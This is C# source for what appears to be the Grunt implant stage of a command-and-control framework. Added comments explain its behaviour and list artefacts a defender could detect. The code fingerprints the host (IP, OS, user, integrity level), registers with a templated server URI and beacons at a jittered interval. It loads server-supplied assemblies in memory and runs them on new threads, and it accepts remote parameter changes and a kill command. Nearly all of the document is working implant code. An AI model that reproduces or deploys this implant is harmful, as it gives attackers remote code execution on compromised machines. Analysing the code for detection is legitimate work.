/// <summary>
/// Event payload for a finished tasking: the tasking it answers and the text that
/// the TaskCompleted handler posts back under <c>message.name</c>.
/// </summary>
/// <param name="message">The tasking this result belongs to.</param>
/// <param name="output">The output produced for that tasking.</param>
public TaskCompletedArgs(GruntTaskingMessage message, String output)
{
    // Plain field capture; the two assignments are independent of each other.
    this.output = output;
    this.message = message;
}
/// <summary>
/// Main beacon loop of the generated implant stage. Collects host facts, registers with the
/// server through <c>GruntMessenger</c>, then polls for taskings at a jittered interval and
/// dispatches them: in-memory assembly execution, runtime parameter changes, or exit.
/// For defenders, the observable artefacts in this method are the periodic sleep-then-poll
/// cadence, the registration body fields, and <c>Assembly.Load(byte[])</c> of server-supplied
/// bytes on a fresh thread per tasking.
/// </summary>
/// <param name="SessionKey">Symmetric key handed to <c>GruntMessenger</c>; how it is applied to the
/// traffic is not visible in this method.</param>
/// <remarks>
/// Every <c>{{REPLACE_*}}</c> token is a template placeholder, presumably substituted when the
/// stage is generated; the <c>Convert.ToInt32</c> calls on them throw <c>FormatException</c> if a
/// placeholder is left unsubstituted, which lands in the outer catch below.
/// The loop exits only via <c>return</c>: <c>alive</c> is never set to <c>false</c>.
/// </remarks>
public static void Execute(Aes SessionKey)
{
    try
    {
        // Server endpoint and a certificate hash; the hash is only passed through to
        // GruntMessenger here (presumably for pinning - not verifiable from this method).
        string CovenantURI = @"{{REPLACE_COVENANT_URI}}";
        string CovenantCertHash = @"{{REPLACE_COVENANT_CERT_HASH}}";
        int Id = Convert.ToInt32(@"{{REPLACE_GRUNT_ID}}");
        string Name = @"{{REPLACE_GRUNT_NAME}}";
        // Beacon timing: base delay in seconds plus a random jitter (see the Thread.Sleep below).
        int Delay = Convert.ToInt32(@"{{REPLACE_DELAY}}");
        int Jitter = Convert.ToInt32(@"{{REPLACE_JITTER}}");
        // Consecutive poll failures tolerated before the loop gives up (see the inner catch).
        int ConnectAttempts = Convert.ToInt32(@"{{REPLACE_CONNECT_ATTEMPTS}}");
        // HTTP profile (headers, URLs, cookies, request/response templates). The lists are
        // populated by the generator at the comment placeholders; here they start empty.
        List <string> ProfileHttpHeaderNames = new List <string>();
        List <string> ProfileHttpHeaderValues = new List <string>();
        // {{REPLACE_PROFILE_HTTP_HEADERS}}
        List <string> ProfileHttpUrls = new List <string>();
        // {{REPLACE_PROFILE_HTTP_URLS}}
        List <string> ProfileHttpCookies = new List <string>();
        // {{REPLACE_PROFILE_HTTP_COOKIES}}
        string ProfileHttpGetResponse = @"{{REPLACE_PROFILE_HTTP_GET_RESPONSE}}";
        string ProfileHttpPostRequest = @"{{REPLACE_PROFILE_HTTP_POST_REQUEST}}";
        string ProfileHttpPostResponse = @"{{REPLACE_PROFILE_HTTP_POST_RESPONSE}}";
        // Host fingerprint for registration. Default to the first resolved address, then prefer
        // the first IPv4 one. Indexing [0] throws if the host resolves to no addresses at all.
        string IPAddress = Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
        foreach (IPAddress a in Dns.GetHostAddresses(Dns.GetHostName()))
        {
            if (a.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
            {
                IPAddress = a.ToString();
                break;
            }
        }
        string OperatingSystem = Environment.OSVersion.ToString();
        string Process = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
        // Integrity level reported to the server: 2 by default, 4 when running as "system",
        // 3 when the token's owner differs from its user (used here as an elevation heuristic).
        int Integrity = 2;
        if (Environment.UserName.ToLower() == "system")
        {
            Integrity = 4;
        }
        else
        {
            var identity = WindowsIdentity.GetCurrent();
            if (identity.Owner != identity.User)
            {
                Integrity = 3;
            }
        }
        string UserDomainName = Environment.UserDomainName;
        string UserName = Environment.UserName;
        // Registration body assembled by string concatenation; the host-derived values are
        // inserted without JSON escaping. The fixed key set (id, name, integrity, process,
        // userDomainName, userName, delay, jitter, connectAttempts, status, ipAddress,
        // operatingSystem) is a stable shape of the first message this stage sends.
        string RegisterBody = @"{ ""id"": " + Convert.ToString(Id) + @", ""name"": """ + Name + @""", ""integrity"": " + Integrity + @", ""process"": """ + Process + @""", ""userDomainName"": """ + UserDomainName + @""", ""userName"": """ + UserName + @""", ""delay"": " + Convert.ToString(Delay) + @", ""jitter"": " + Convert.ToString(Jitter)
            + @", ""connectAttempts"": " + Convert.ToString(ConnectAttempts) + @", ""status"": 0, ""ipAddress"": """ + IPAddress + @""", ""operatingSystem"": """ + OperatingSystem + @""" }";
        // Registration happens inside the GruntMessenger constructor as far as this method shows;
        // no separate register call is made here.
        GruntMessenger messenger = new GruntMessenger
        (
            Id, Name, CovenantURI, CovenantCertHash, SessionKey, RegisterBody,
            ProfileHttpHeaderNames, ProfileHttpHeaderValues, ProfileHttpUrls, ProfileHttpCookies,
            ProfileHttpGetResponse, ProfileHttpPostRequest, ProfileHttpPostResponse
        );
        // Task results are posted back keyed by the tasking's name, from whichever thread
        // raises TaskCompleted.
        TaskHandler taskSender = new TaskHandler();
        EventHandler <TaskCompletedArgs> taskHandler = (sender, eventArgs) =>
        {
            messenger.PostMessage(eventArgs.output, eventArgs.message.name);
        };
        taskSender.TaskCompleted += taskHandler;
        Random rnd = new Random();
        int ConnectAttemptCount = 0;
        bool alive = true;
        while (alive)
        {
            // Sleep (Delay + [0, Jitter)) seconds before each poll - the beacon cadence.
            Thread.Sleep((Delay + rnd.Next(Jitter)) * 1000);
            try
            {
                // A null message is treated as "nothing to do"; any non-null message resets
                // the failure counter.
                GruntTaskingMessage message = messenger.GetMessage("");
                if (message != null)
                {
                    ConnectAttemptCount = 0;
                    if (message.type == GruntTaskingType.Assembly)
                    {
                        // Wire format: base64(compressed assembly) followed by comma-separated
                        // base64 UTF-8 string arguments.
                        string[] pieces = message.message.Split(',');
                        if (pieces.Length > 0)
                        {
                            object[] parameters = null;
                            if (pieces.Length > 1)
                            {
                                parameters = new object[pieces.Length - 1];
                            }
                            for (int i = 1; i < pieces.Length; i++)
                            {
                                parameters [i - 1] = Encoding.UTF8.GetString(Convert.FromBase64String(pieces[i]));
                            }
                            byte[] compressedBytes = Convert.FromBase64String(pieces[0]);
                            byte[] decompressedBytes = Utilities.Decompress(compressedBytes);
                            // Server-supplied assembly loaded from memory (no file on disk) and
                            // run on an untracked thread that is never joined; returning from
                            // this method does not stop threads already started here.
                            Assembly gruntTask = Assembly.Load(decompressedBytes);
                            new Thread(() => taskSender.ExecuteTask(gruntTask, parameters, message)).Start();
                        }
                    }
                    else if (message.type == GruntTaskingType.Set)
                    {
                        // "<Delay|Jitter|ConnectAttempts>,<value>" - changes loop parameters in place.
                        GruntSetTaskingType type = (GruntSetTaskingType)Enum.Parse(typeof(GruntSetTaskingType), message.message.Substring(0, message.message.IndexOf(',')));
                        String val = message.message.Substring(message.message.IndexOf(',') + 1);
                        if (type == GruntSetTaskingType.Delay)
                        {
                            Delay = int.Parse(val);
                        }
                        else if (type == GruntSetTaskingType.Jitter)
                        {
                            Jitter = int.Parse(val);
                        }
                        else if (type == GruntSetTaskingType.ConnectAttempts)
                        {
                            ConnectAttempts = int.Parse(val);
                        }
                    }
                    else if (message.type == GruntTaskingType.Kill)
                    {
                        // Acknowledges with "Killed" and leaves the loop.
                        messenger.PostMessage("Killed", message.name);
                        return;
                    }
                }
            }
            catch (Exception)
            {
                // Any exception in the poll/dispatch path - not only network failures, also
                // malformed taskings (bad base64, unknown enum name, bad int) - counts as one
                // failed attempt; ConnectAttempts consecutive failures end the loop.
                ConnectAttemptCount++;
                if (ConnectAttemptCount >= ConnectAttempts)
                {
                    return;
                }
            }
        }
    }
    catch (Exception e)
    {
        // Setup failures (placeholder parsing, DNS, messenger construction) are written to
        // stderr and swallowed; the method returns normally afterwards.
        Console.Error.WriteLine(e.Message);
        Console.Error.WriteLine(e.StackTrace);
    }
}